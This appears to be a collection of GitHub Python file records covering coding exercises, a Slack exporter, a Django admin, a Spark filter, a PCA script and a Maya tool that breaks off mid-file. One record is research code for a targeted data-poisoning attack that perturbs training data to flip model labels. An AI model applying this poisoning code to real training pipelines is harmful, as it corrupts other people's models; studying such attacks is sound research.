copyRandomList(self, head):\n        \"\"\"\n        :type head: Node\n        :rtype: Node\n        \"\"\"\n        def dfs(node):\n            if not node:\n                return None\n            if node in rec:\n                return rec[node]\n            new = Node(node.val)\n            rec[node] = new\n            new.next = dfs(node.next)\n            new.random = dfs(node.random)\n            return new\n\n        rec = {}\n        return dfs(head)\n\n\ndef create(nums):\n    aux = p = Node(0)\n    rec = []\n    for x in nums:\n        p.next = Node(x[0])\n        p = p.next\n        rec.append(p)\n    for i, x in enumerate(nums):\n        if x[1] is not None:\n            rec[i].random = rec[x[1]]\n    return aux.next\n\n\ndef main():\n    nums = [[7, None], [13, 0], [11, 4], [10, 2], [1, 0]]\n    nums = [[1, 1], [2, 1]]\n    nums = [[3, None], [3, 0], [3, None]]\n    # nums = []\n    test = Solution()\n    ret = test.copyRandomList(create(nums))\n    print(ret)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"Jackyzzk/Coding-Interviews-2","sub_path":"剑指offer-面试题35. 
复杂链表的复制-dfs.py","file_name":"剑指offer-面试题35. 复杂链表的复制-dfs.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"31037928752","text":"# ******************************************************************************\r\n# Author:  Jason Neblett\r\n# Lab:  Lab 6\r\n# Date: 02/20/2022\r\n# Description:  Classes and Objects\r\n# Input:  Dictionary of names, dates, gender, and number \r\n# Output:  Dictionary List of names, dates, gender and number\r\n\r\n\r\nfrom Name import *\r\nfrom Database import Database\r\n\r\n\r\ndef main():\r\n    # readNames is presumably a classmethod, so cls is supplied automatically\r\n    names = Name.readNames()\r\n    for name in names:\r\n        print(f\"{name['name']}\\t{name['year']}\\t{name['gender']}\\t{name['Count']}\")\r\n\r\n    year = Database.year()\r\n    gender = Database.gender()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    main()","repo_name":"jasonneblett/Lab6","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"38725297813","text":"\"\"\"Main class, holding information about models and training/testing routines.\"\"\"\n\nimport torch\nimport time\nfrom ..consts import BENCHMARK\nfrom ..utils import cw_loss\nimport pdb\nimport random\ntorch.backends.cudnn.benchmark = BENCHMARK\n\nfrom .forgemaster_base import _Forgemaster\nfrom ..consts import NON_BLOCKING, BENCHMARK\n\nclass ForgemasterTargeted_both_causal(_Forgemaster):\n\n    def _initialize_forge(self, client, furnace):\n        \"\"\"Implement common initialization operations for forging.\"\"\"\n        client.eval(dropout=True)\n        # The PGD tau that will actually be used:\n        # This is not super-relevant for the adam variants\n        # but the PGD variants are especially sensitive\n        # E.G: 92% for PGD with rule 1 and 20% for rule 2\n        if self.args.attackoptim in ['PGD', 'GD']:\n            # Rule 1\n            #self.tau0 = self.args.eps / 255 / furnace.ds * self.args.tau * (self.args.pbatch / 512) / self.args.ensemble\n            self.tau0 = self.args.eps / 255 / furnace.ds * self.args.tau\n\n        elif self.args.attackoptim in ['momSGD', 'momPGD']:\n            # Rule 1a\n            self.tau0 = self.args.eps / 255 / furnace.ds * self.args.tau * (self.args.pbatch / 512) / self.args.ensemble\n            self.tau0 = self.tau0.mean()\n        else:\n            # Rule 2\n            self.tau0 = self.args.tau * (self.args.pbatch / 512) / self.args.ensemble\n\n        if self.args.full_data:\n            dataloader = furnace.trainloader\n        else:\n            dataloader = furnace.poisonloader\n\n        # update class_mu for causal_criterion\n        mu = [torch.zeros(1, client.causal_model.hid_channels) for _ in range(furnace.num_class)]\n        num = [0 for _ in range(furnace.num_class)]\n        for batch, example in enumerate(dataloader):\n            inputs, labels, ids = example\n            inputs = inputs.to(**self.setup)\n            labels_cuda = labels.to(dtype=torch.long, device=self.setup['device'], non_blocking=NON_BLOCKING)\n\n            if 's' in self.args.causal_loss_type:\n                with torch.no_grad():\n                    rep = client.causal_model.get_causal_rep(inputs).cpu()\n            else:\n                x_s, x_v, x_v_att = client.causal_model.split_x(inputs, labels_cuda, eval=True)\n                with torch.no_grad():\n                    rep = client.causal_model.get_conf_rep(x_v).cpu()\n            for i in range(inputs.size(0)):\n                mu[labels[i]] += rep[i]\n                num[labels[i]] += 1\n        for j in range(furnace.num_class):\n            mu[j] /= num[j]\n        client.causal_criterion.update_mu(torch.cat(mu, dim=0).to(**self.setup))\n\n\n\n    def _define_objective(self, inputs, labels):\n        \"\"\"Implement the closure here.\"\"\"\n        def closure(model, criterion, optimizer, causal_model, causal_criterion):\n            
\"\"\"This function will be evaluated on all GPUs.\"\"\"  # noqa: D401\n            outputs = model(inputs)\n            new_labels = self._label_map(outputs, labels)\n\n            causal_criterion.loss_type = self.args.causal_loss_type\n            causal_criterion.beta = 1\n            s_loss = causal_criterion.run(causal_model, inputs, labels, new_labels)\n            s_loss.backward(retain_graph=self.retain)\n\n            # add causal_loss\n            causal_criterion.loss_type = 'perturb_v_output'\n            causal_criterion.beta = self.args.causal_beta\n            v_loss = causal_criterion.run(causal_model, inputs, labels, new_labels)\n            loss = s_loss + v_loss  # combined loss, reported back to the trial loop\n\n            v_loss.backward(retain_graph=self.retain)\n            prediction = (outputs.data.argmax(dim=1) == new_labels).sum()\n\n            return loss.detach().cpu(), prediction.detach().cpu()\n        return closure\n\n    def _label_map(self, outputs, labels):\n        # This is a naive permutation on the label space. You can implement\n        # any permutation you like here.\n        new_labels = (labels + 1) % outputs.shape[1]\n        return new_labels\n\n    def _run_trial(self, client, furnace):\n        \"\"\"Run a single trial.\"\"\"\n        poison_delta = furnace.initialize_poison()\n        if self.args.full_data:\n            dataloader = furnace.trainloader\n        else:\n            dataloader = furnace.poisonloader\n\n        if self.args.attackoptim in ['Adam', 'signAdam', 'momSGD', 'momPGD']:\n            # poison_delta.requires_grad_()\n            if self.args.attackoptim in ['Adam', 'signAdam']:\n                att_optimizer = torch.optim.Adam([poison_delta], lr=self.tau0, weight_decay=0)\n            else:\n                att_optimizer = torch.optim.SGD([poison_delta], lr=self.tau0, momentum=0.9, weight_decay=0)\n            if self.args.scheduling:\n                scheduler = torch.optim.lr_scheduler.MultiStepLR(att_optimizer, milestones=[self.args.attackiter // 2.667, self.args.attackiter // 1.6,\n                                                                                           self.args.attackiter // 1.142], gamma=0.1)\n            poison_delta.grad = torch.zeros_like(poison_delta)\n            dm, ds = furnace.dm.to(device=torch.device('cpu')), furnace.ds.to(device=torch.device('cpu'))\n            poison_bounds = torch.zeros_like(poison_delta)\n        else:\n            poison_bounds = None\n\n        for step in range(self.args.attackiter):\n            if step % 10 == 0:\n                print(f'Step {step}')\n            if step == self.args.attackiter // 2 and self.args.causal_reverse:\n                if self.args.causal_loss_type == \"perturb_s_output\":\n                    client.causal_criterion.loss_type = \"perturb_v_output_min\"\n                elif self.args.causal_loss_type == \"perturb_v_output\":\n                    client.causal_criterion.loss_type = \"perturb_s_output_min\"\n            target_losses = 0\n            poison_correct = 0\n            for batch, example in enumerate(dataloader):\n                if batch == 0:\n                    start = time.time()\n                elif batch % 100 == 0:\n                    end = time.time()\n                    avg = (end-start)/100\n                    start = end\n                    print(f'average time per epoch: {len(dataloader) * avg}')\n                loss, prediction = self._batched_step(poison_delta, poison_bounds, example, client, furnace)\n                target_losses += loss\n                poison_correct += prediction\n\n                if self.args.dryrun:\n                    break\n\n            # Note that these steps are handled batch-wise for PGD in _batched_step\n            # For the momentum optimizers, we only accumulate gradients for all poisons\n            # and then use optimizer.step() for the update. This is math. 
equivalent\n            # and makes it easier to let pytorch track momentum.\n            if self.args.attackoptim in ['Adam', 'signAdam', 'momSGD', 'momPGD']:\n                if self.args.attackoptim in ['momPGD', 'signAdam']:\n                    poison_delta.grad.sign_()\n                att_optimizer.step()\n                if self.args.scheduling:\n                    scheduler.step()\n                att_optimizer.zero_grad()\n                with torch.no_grad():\n                    # Projection Step\n                    poison_delta.data = torch.max(torch.min(poison_delta, self.args.eps /\n                                                            ds / 255), -self.args.eps / ds / 255)\n                    poison_delta.data = torch.max(torch.min(poison_delta, (1 - dm) / ds -\n                                                            poison_bounds), -dm / ds - poison_bounds)\n\n            target_losses = target_losses / (batch + 1)\n            poison_acc = poison_correct / len(dataloader.dataset)\n            if step % (self.args.attackiter // 5) == 0 or step == (self.args.attackiter - 1):\n                print(f'Iteration {step}: Target loss is {target_losses:2.4f}, '\n                      f'Poison clean acc is {poison_acc * 100:2.2f}%')\n\n            if self.args.step:\n                if self.args.clean_grad:\n                    client.step(furnace, None, self.targets, self.true_classes)\n                else:\n                    client.step(furnace, poison_delta, self.targets, self.true_classes)\n\n            if self.args.dryrun:\n                break\n\n        return poison_delta, target_losses\n","repo_name":"Thinklab-SJTU/DICE","sub_path":"poison/village/shop/forgemaster_targeted_both_causal.py","file_name":"forgemaster_targeted_both_causal.py","file_ext":"py","file_size_in_byte":8260,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
+{"seq_id":"29804926899","text":"import threading\n\nfrom cursed_snake.controller.game_controller import run_game_loop\nfrom cursed_snake.server.http_server import start_server\n\n\ndef main() -> None:\n    tasks = [start_server]\n    for task in tasks:\n        thread = threading.Thread(target=task)\n        thread.start()\n    run_game_loop()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"stewartHutchins/cursed-snake","sub_path":"game/src/cursed_snake/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":343,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"13960224381","text":"import requests\nimport json\nimport argparse\nimport codecs\n\n\ndef parse_args():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"--channel\", type=str, required=True, help=\"Set the Slack channel ID. [required]\")\n    parser.add_argument(\"--out\", type=str, required=True, help=\"Specify the JSON output file name; a full path may be given.\")\n    return parser.parse_args()\n\n\ndef get_conversations(args):\n    messages = []\n    url = \"https://slack.com/api/conversations.history\"\n    token = \"xxxx-xxxxxxxxxxx-xxxxxxxxxxx-xxxxxxxxxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"\n\n    header = {\n        \"Authorization\": \"Bearer {}\".format(token)\n    }\n\n    payload = {}\n    payload.update({\"channel\": args.channel})\n\n    response = requests.get(url, headers=header, params=payload)\n    response_dic = response.json()\n    messages.append(response_dic[\"messages\"])\n    while True:\n        next_cursor = \"\"\n        try:\n            if (\"response_metadata\" in response_dic) and (len(response_dic[\"response_metadata\"][\"next_cursor\"]) > 0):\n                next_cursor = response_dic[\"response_metadata\"][\"next_cursor\"]\n            else:\n                break\n        except KeyError:\n            break\n        payload.update({\"cursor\": next_cursor})\n        response = requests.get(url, headers=header, params=payload)\n        response_dic = response.json()\n        messages.append(response_dic[\"messages\"])\n\n    return messages\n\n\nif __name__ == \"__main__\":\n    # parse the execution parameters\n    args = parse_args()\n    messages_group = get_conversations(args)\n\n    msg_dicts = []\n    for i, messages in 
enumerate(messages_group):\n        if i == 0:\n            msg_dicts = messages\n            continue\n        for message in messages:\n            msg_dicts.append(message)\n\n    # dump the collected messages to a JSON file\n    with codecs.open(args.out, 'w', 'utf-8') as outfile:\n        json.dump(msg_dicts, outfile, ensure_ascii=False, indent=4)\n\n","repo_name":"srvhat09/slack_getChannel","sub_path":"slack_getChannel.py","file_name":"slack_getChannel.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"11357791955","text":"from datetime import datetime\nimport logging\nfrom pprint import pformat\n\nfrom ploceidae.dependency.dependency_wrapper import DependencyWrapper\nfrom ploceidae.dependency.dependency_wrapper_helper_methods import DependencyWrapperHelperMethods\nfrom ploceidae.container.partial_injection import PartialInjection\n\nlogger = logging.getLogger(__name__)\n\n__all__ = [\"Container\"]\n\n\nclass Container(object):\n\n    def __init__(self, dependency_graph_manager):\n        self.dependency_graph_manager = dependency_graph_manager\n\n    def wire_dependencies(self, object_to_wire_up, *dependencies_to_ignore):\n        return self.partially_wire_dependencies(object_to_wire_up, *dependencies_to_ignore)()\n\n    def partially_wire_dependencies(self, object_to_wire_up, *dependencies_to_ignore):\n        DependencyWrapperHelperMethods.input_validation_for_dependency_object(object_to_wire_up)\n\n        dependency_wrapper = DependencyWrapper.get_dependency_without_decoration(object_to_wire_up, None, self.dependency_graph_manager)\n\n        return self.partially_wire_dependencies_inner(dependency_wrapper, dependencies_to_ignore, object_to_wire_up)\n\n    def partially_wire_dependencies_inner(self, dependency_wrapper, dependencies_to_ignore, object_to_wire_up):\n        time_stamp = datetime.now()\n        resolved_dependencies = self.dependency_graph_manager.resolve_dependencies(dependency_wrapper, time_stamp,\n                                                                                  *dependencies_to_ignore)\n        args_to_apply_as_dict = self.get_args_to_apply_as_dict(dependency_wrapper, dependencies_to_ignore,\n                                                               resolved_dependencies)\n        args_to_apply_as_group = resolved_dependencies.resolved_dependencies_by_group\n\n        self.log_partial_injection_data(dependency_wrapper, dependencies_to_ignore, args_to_apply_as_dict, args_to_apply_as_group)\n        partial_injection = PartialInjection(object_to_wire_up, dependencies_to_ignore, *args_to_apply_as_group,\n                                             **args_to_apply_as_dict)\n        return self.generate_partial_injection(partial_injection, object_to_wire_up, time_stamp)\n\n    def generate_partial_injection(self, partial_injection, object_to_wire_up, time_stamp):\n        def nested(*args, **kwargs):\n            #logger.debug(\"calling replacing alt keys callback\")\n            ret = partial_injection(*args, **kwargs)\n            self.dependency_graph_manager.replace_alt_keys_with_valid_dependency_lifetime_from_instance(ret, object_to_wire_up, time_stamp)\n            return ret\n        return nested\n\n    @staticmethod\n    def log_partial_injection_data(wrapped_dependency_object, dependencies_to_ignore, args_to_apply_as_dict, args_to_apply_as_group):\n        message = \"\\n\\nfor {0} ignoring: \\n{1}\\napplying as dict: \\n{2}\\napplying as group: \\n{3}\\n\"\n        data = map(pformat, (dependencies_to_ignore, args_to_apply_as_dict, args_to_apply_as_group))\n        #logger.info(message.format(wrapped_dependency_object.dependency_name, *data))\n\n    @staticmethod\n    def get_args_to_apply_as_dict(wrapped_dependency_object, dependencies_to_ignore, resolved_dependencies):\n        enumerator_on_dependencies = enumerate(filter(lambda dependency: dependency not in dependencies_to_ignore, 
wrapped_dependency_object.dependencies))\n        return {dependency: resolved_dependencies.resolved_dependencies[index] for index, dependency in enumerator_on_dependencies}\n","repo_name":"MATTHEWFRAZER/ploceidae","sub_path":"ploceidae/container/container.py","file_name":"container.py","file_ext":"py","file_size_in_byte":3481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"24939136537","text":"n = int(input())  # number of dancers\np = int(input())  # the dancer's number\nk = int(input())  # number of steps\nArr = []\nfor i in range(n):\n    Arr.append(i + 1)\nk_pos = k % n\nfor i in range(k_pos):\n    if i % 2 == 0:\n        for m in range(0, n, 2):\n            Arr[m], Arr[m + 1] = Arr[m + 1], Arr[m]\n    else:\n        Arr[0], Arr[n - 1] = Arr[n - 1], Arr[0]\n        for g in range(1, n - 2, 2):\n            Arr[g], Arr[g + 1] = Arr[g + 1], Arr[g]\n        print(Arr)\nfor i in range(n):\n    if Arr[i] == p:\n        if Arr[i] == Arr[0]:\n            if Arr[-1] > Arr[1]:\n                print(Arr[1], Arr[-1])\n                break\n            else:\n                print(Arr[-1], Arr[1])\n                break\n        if Arr[i] == Arr[-1]:\n            if Arr[-2] > Arr[0]:\n                print(Arr[0], Arr[-2])\n                break\n            else:\n                print(Arr[-2], Arr[0])\n                break\n        print(Arr[i - 1], Arr[i + 1])","repo_name":"picto7/work_207","sub_path":"olympiada/task_4.py","file_name":"task_4.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"71429136488","text":" \nfrom pyspark import SparkContext \nfrom pyspark.streaming import StreamingContext \nfrom pyspark.streaming.kafka import KafkaUtils \n \nsc = SparkContext(appName=\"FilterSensorData\") \nssc = StreamingContext(sc,1) \n \n#Replace with DNS of instance running Zookeeper \nzkQuorum = \"ip-172-31-33-135.ec2.internal:2181\" \ntopic = \"forestfire\" \n \nkvs = KafkaUtils.createStream(ssc, zkQuorum, \n                             \"spark-streaming-consumer\", {topic:1}) \nlines = kvs.map(lambda x: x[1]) \n \nsplitlines = lines.map(lambda line: line.split(',')) \nfilteredlines = splitlines.filter(lambda line: int(line[1])>20 and \n                                 int(line[2])>20 and int(line[3])>6000 \n                                 and int(line[4])>200) \n \nfilteredlines.pprint() \n \nssc.start() \nssc.awaitTermination()\n","repo_name":"arshdeepbahga/cloud-computing-solutions-architect-book-code","sub_path":"Chapter-11/sensor-data-analysis/filtering.py","file_name":"filtering.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"}
+{"seq_id":"5430541108","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 25 15:47:32 2020\n\n@author: santi\n\"\"\"\n\n\ndef lista_divisores(n):\n    \"\"\"\n    Receives a number n and returns a list of its divisors\n\n    \"\"\" \n    lista = []\n    for i in range(1,n):\n        if n % i == 0:\n            lista.append(i)\n    return lista\n\ndef suma_divisores(n):\n    \"\"\"\n    Receives a number n and returns the sum of its divisors\n\n    \"\"\" \n    suma = 0\n    for i in lista_divisores(n):\n        suma += i\n    return suma\n\ndef es_abundante(a):\n    return a < suma_divisores(a)\n\nlista = []\nlista2 = []\n\n\nfor i in range(12,28123):\n    if es_abundante(i):\n        lista.append(i)\n    \nfor i in lista:\n    for p in lista[lista.index(i):]:\n        if (i+p) <= 28123:\n            lista2.append(i+p)\n    \nlista2 = list(dict.fromkeys(lista2))\n\nsuma = ((28123*28124)/2) - sum(lista2)\n\n    \n    ","repo_name":"santiperone/ProjectEuler","sub_path":"23.py","file_name":"23.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"20919991507","text":"from django.contrib import admin\nfrom django.apps import apps\nfrom django.contrib.auth.admin import UserAdmin\n\nfrom s_admin.forms import CustomUserCreationForm, CustomUserChangeForm\nfrom s_admin.models import *\n\n# Register your models here.\n \nclass ProfileInline(admin.StackedInline):\n model = UserProfile\n can_delete = False\n verbose_name_plural = 'UserProfile'\n fk_name = 'user'\n\nclass CustomUserAdmin(UserAdmin):\n inlines = (ProfileInline, )\n \n add_form = CustomUserCreationForm\n form = CustomUserChangeForm\n model = CustomUser\n list_display = (\"email\", \"is_staff\", \"is_active\",)\n list_filter = (\"email\", \"is_staff\", \"is_active\",)\n list_select_related = ('user_profile', ) \n fieldsets = (\n (None, {\"fields\": (\"email\", \"password\")}),\n (\"Permissions\", {\"fields\": (\"is_staff\", \"is_active\", \"groups\", \"user_permissions\")}),\n )\n add_fieldsets = (\n (None, {\n \"classes\": (\"wide\",),\n \"fields\": (\n \"email\", \"password1\", \"password2\", \"is_staff\",\n \"is_active\", \"groups\", \"user_permissions\"\n )}\n ),\n )\n search_fields = (\"email\",)\n ordering = (\"email\",)\n \n\n def get_inline_instances(self, request, obj=None):\n if not obj:\n return list()\n return super(CustomUserAdmin, self).get_inline_instances(request, obj)\n\n# newModels = apps.get_models()\n\n# admin.site.unregister(CustomUser)\nadmin.site.register(CustomUser, CustomUserAdmin)\nadmin.site.register(UserProfile)\n\nadmin.site.register(OrganizationSetting)\nadmin.site.register(Zone)\nadmin.site.register(Area)\nadmin.site.register(ZoneGroup)\nadmin.site.register(Streets)\nadmin.site.register(FeeSettings)\nadmin.site.register(RoleSettings)\nadmin.site.register(PermissionSettings)\n# admin.site.register(RolePermissions)\n\n\nadmin.site.site_header = \"Shine Co-Operative Society\"\n\n# admin.site.site_header = 'Awesome Inc. 
Administration'\nadmin.site.site_title = 'Shine Co-Operative Society'","repo_name":"adroit48Dev/danshine","sub_path":"s_admin/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"26594802052","text":"\nimport numpy as np\nimport pandas as pd\nimport statsmodels.api as sm\nimport matplotlib.pyplot as plt\nimport matplotlib.font_manager\nfrom matplotlib import style\nstyle.use('ggplot') or plt.style.use('ggplot')\nfrom sklearn.decomposition import PCA\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import scale\nimport warnings\n\n#%% import and describe the data\nwarnings.filterwarnings('ignore')\n\ndatos = pd.read_excel(\"Anexo 2 - Datos depurados.xlsx\")\ndatos.info()\n\nprint('Variance of each variable')\nprint(datos.var(axis=0))\n\n#%% Train the PCA model with data scaling\n\npca_pipe = make_pipeline(StandardScaler(), PCA())\npca_pipe.fit(datos)\n\n# Extract the model from the pipeline\nmodelo_pca = pca_pipe.named_steps['pca']\n\n#%% Convert the array to a dataframe to add names to the axes.\npd.DataFrame( data=modelo_pca.components_, columns=datos.columns, index=['Patentes', 'PIB per capita', 'Inversion i+d', 'Calidad institucional', \"Penetración de internet\"])\n\n\n\nfig, ax = plt.subplots(nrows=1, ncols=1, figsize=(4, 2))\ncomponentes = modelo_pca.components_\nplt.imshow(componentes.T, cmap='viridis', aspect='auto')\nplt.yticks(range(len(datos.columns)), datos.columns)\nplt.xticks(range(len(datos.columns)), np.arange(modelo_pca.n_components_) + 1)\nplt.grid(False)\nplt.colorbar()\nplt.show()\n\n#%% Percentage of variance explained by each component\n\n\nprint('Percentage of variance explained by each component')\n\nprint(modelo_pca.explained_variance_ratio_)\n\nfig, ax = plt.subplots(nrows=1, ncols=1, figsize=(6, 4))\nax.bar(x=np.arange(modelo_pca.n_components_) + 1, height=modelo_pca.explained_variance_ratio_)\n\nfor x, y in zip(np.arange(len(datos.columns)) + 1, modelo_pca.explained_variance_ratio_):\n    label = round(y, 2)\n    ax.annotate(label, (x, y), textcoords=\"offset points\", xytext=(0,10), ha='center')\n\n\nax.set_xticks(np.arange(modelo_pca.n_components_) + 1)\nax.set_ylim(0, 1.1)\nax.set_title('Proportion of variance explained by each component')\nax.set_xlabel('Principal component')\nax.set_ylabel('Proportion of variance explained')\nplt.show()\n\n# Cumulative percentage of variance explained\n\nprop_varianza_acum = modelo_pca.explained_variance_ratio_.cumsum()\n\nprint('Cumulative percentage of variance explained')\n\nprint(prop_varianza_acum)\n\n\nfig, ax = plt.subplots(nrows=1, ncols=1, figsize=(6, 4))\nax.bar(x=np.arange(modelo_pca.n_components_) + 1, height=modelo_pca.explained_variance_ratio_)\n\nfor x, y in zip(np.arange(len(datos.columns)) + 1, modelo_pca.explained_variance_ratio_):\n    label = round(y, 2)\n    ax.annotate(label, (x, y), textcoords=\"offset points\", xytext=(0, 10), ha='center')\n\nax.set_xticks(np.arange(modelo_pca.n_components_) + 1)\nax.set_ylim(0, 1.1)\nax.set_title('Percentage of variance explained by each component')\nax.set_xlabel('Principal component')\nax.set_ylabel('Pct. 
variance explained')\n\n# Cumulative percentage of variance explained\n\nprop_varianza_acum = modelo_pca.explained_variance_ratio_.cumsum()\nprint('Cumulative percentage of variance explained')\nprint(prop_varianza_acum)\nfig, ax = plt.subplots(nrows=1, ncols=1, figsize=(6, 4))\nax.plot(np.arange(len(datos.columns)) + 1, prop_varianza_acum, marker='o')\n\nfor x, y in zip(np.arange(len(datos.columns)) + 1, prop_varianza_acum):\n    label = round(y, 2)\n    ax.annotate(label, (x, y), textcoords=\"offset points\", xytext=(0, 10), ha='center')\n\nax.set_ylim(0, 1.1)\nax.set_xticks(np.arange(modelo_pca.n_components_) + 1)\nax.set_title('Cumulative proportion of variance explained')\nax.set_xlabel('Principal component')\nax.set_ylabel('Pct. cumulative variance')\nplt.show()\n\n","repo_name":"Danezc/Medici-n-de-la-innovaci-n-tecnologica-usando-MC","sub_path":"Anexo 7 - PCA test.py","file_name":"Anexo 7 - PCA test.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"8825756824","text":"from django.urls import path, re_path\n\nfrom api.applications.views import application_views as views\nfrom api.applications.views import application_document_views as document_views\n\nurlpatterns = [\n    path(\n        'funds//company-documents/',\n        document_views.ApplicationCompanyDocumentUpdateAPIView.as_view(),\n        name=\"application-company-documents-update\"\n    ),\n    path(\n        'funds//company-documents/',\n        document_views.ApplicationCompanyDocumentListAPIView.as_view(),\n        name=\"application-company-documents\"\n    ),\n    re_path(\n        'funds/(?P.+)/company-documents/signing_url/(?P\\d+)',\n        document_views.GetUserSigningURLAPIView.as_view(),\n        name=\"application-company-documents-signing-url\"\n    ),\n    re_path(\n        'funds/(?P.+)/company-documents/store_response/(?P.+)',\n        document_views.StoreUserSignedResponse.as_view(),\n        name=\"application-company-documents-signing-url\"\n    ),\n    path('funds//applications', views.ApplicationListAPIView.as_view(), name=\"application-retrieve\"),\n    path('funds//default', views.ApplicationDefaultsAPIView.as_view(), name=\"application-defaults\"),\n    path(\n        'funds//has-pending-requests',\n        views.ApplicationHasRequestedChangeAPIView.as_view(),\n        name=\"has-pending-requests\"\n    ),\n    path(\n        'funds//state',\n        views.UserApplicationStateListCreateAPIView.as_view(),\n        name=\"user-fund-application-state\"\n    ),\n    path('', views.ApplicationCreateAPIView.as_view(), name=\"application-create\"),\n    path('applications/', views.ApplicationUpdateAPIView.as_view(), name=\"application-update\"),\n    path(\n        'application-document-request/',\n        views.ApplicationDocumentsRequestsListView.as_view(),\n        name='application-document-request-create'\n    ),\n    path(\n        'application-document-request-response',\n        views.ApplicationDocumentRequestResponse.as_view(),\n        name='application-document-request-response'\n    ),\n    path(\n        'application-document-request-response/',\n        views.ApplicationDocumentRequestResponse.as_view(),\n        name='application-document-request-response'\n    ),\n    path(\n        'application-document-response-delete/',\n        views.ApplicationDocumentRequestResponseDestroyView.as_view(),\n        name='application-document-request-response-delete'\n    ),\n    path(\n        'submit-changes',\n        views.ApplicationSubmitChangesAPIView.as_view(),\n        name='submit-changes-for-application'\n    ),\n    path(\n        'application-workflow-status/',\n        views.ApplicationWorkflowStatusAPIView.as_view(),\n        name='application-workflow-status'\n    ),\n    path(\n        'application-module-states/',\n        
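# presumably lists the workflow state of each module for one application\n        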
views.ApplicationModuleStatesAPIView.as_view(),\n        name='application-module-states'\n    ),\n    path(\n        'application-next-state/',\n        views.ApplicationNextStateAPIView.as_view(),\n        name='application-next-state'\n    ),\n    path('', views.ApplicationBaseUpdateAPIView.as_view(), name=\"application-base-update\"),\n]\n","repo_name":"tayyabsaleem7756/jobtest","sub_path":"backend/retail_market/api/applications/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"27983775423","text":"# Program to create list and find most frequent item\n\n\nimport numpy as np\n\n\nd1 = np.random.randint(0, 21, 15)  # randint's upper bound is exclusive (random_integers was removed from NumPy)\n\nprint(d1)\n\nvectorlist = []\n\n# Converting array to list using tolist function\nvectorlist = d1.tolist()\n\nl = len(vectorlist)\n\n\ndef mostfreq(arr, n):\n    # Sort the array\n    arr.sort()\n\n    # find the max frequency using\n    # linear traversal\n    max_count = 1;\n    res = arr[0];\n    curr_count = 1\n\n    for i in range(1, n):\n        if arr[i] == arr[i - 1]:\n            curr_count += 1\n\n        else:\n            if curr_count > max_count:\n                max_count = curr_count\n                res = arr[i - 1]\n\n            curr_count = 1\n\n    # If last element is most frequent\n    if curr_count > max_count:\n        max_count = curr_count\n        res = arr[n - 1]\n\n    return res\n\n\nprint(mostfreq(vectorlist, l))\n","repo_name":"rnekadi/CSEE5590_PYTHON_DEEPLEARNING_FALL2018","sub_path":"ICP4/Numpy.py","file_name":"Numpy.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"22780164057","text":"import os\nimport math\nfrom ldmt_function.ldmt_loadUIFile import get_maya_window, load_ui_type\nimport maya.OpenMayaUI as omui\nfrom ldmt_core import ldmt_cmds as ld\nfrom functools import partial\nimport maya.cmds as cmds\nimport maya.mel as mel\n\ntry:\n    from PySide2.QtCore import * \n    from PySide2.QtGui import * \n    from PySide2.QtWidgets import *\n    from PySide2.QtUiTools import *\n    from PySide2 import __version__\n    from shiboken2 import wrapInstance \nexcept ImportError:\n    from PySide.QtCore import * \n    from PySide.QtGui import * \n    from PySide.QtUiTools import *\n    from PySide import __version__\n    from shiboken import wrapInstance \n\nimport maya.OpenMaya as om\nimport maya.api.OpenMaya as om2\nimport random\nimport ast\n\nLDMTPATH = ld.getPath('LDMT')\nldmt_uifile = LDMTPATH + '/ldmt_ui/ldmt_customGrouper.ui'\nldmt_list_form, ldmt_list_base = load_ui_type(ldmt_uifile)\nldmt_window_name = 'ldmt_customGrouper'\nldmt_button_name = 'btn_'+ldmt_window_name.split('_')[1]\n\n'''\n#UI\n'''\nclass ldmt_cls(ldmt_list_form, ldmt_list_base):\n    def __init__(self, parent = get_maya_window()):\n        super(ldmt_cls, self).__init__(parent)\n        self.window_name = ldmt_window_name\n        self.setupUi(self)\n        self.move(QCursor.pos() + QPoint(20,20))\n        # update the status bar so it's not only shown in the help line window.\n        self.setupBtn()\n        self.statusbar.showMessage(ld.tag())\n        self.installStartBar()\n    \n    def setupBtn(self):\n        self.btn_depthGroupR.clicked.connect(self.depthGroupR)\n        self.btn_depthGroupA.clicked.connect(self.depthGroupA)\n        self.btn_randomGroup.clicked.connect(self.randomGroup)\n        self.text_groupCount.setText('5')\n    def getGroupCount(self):\n        groupCount = 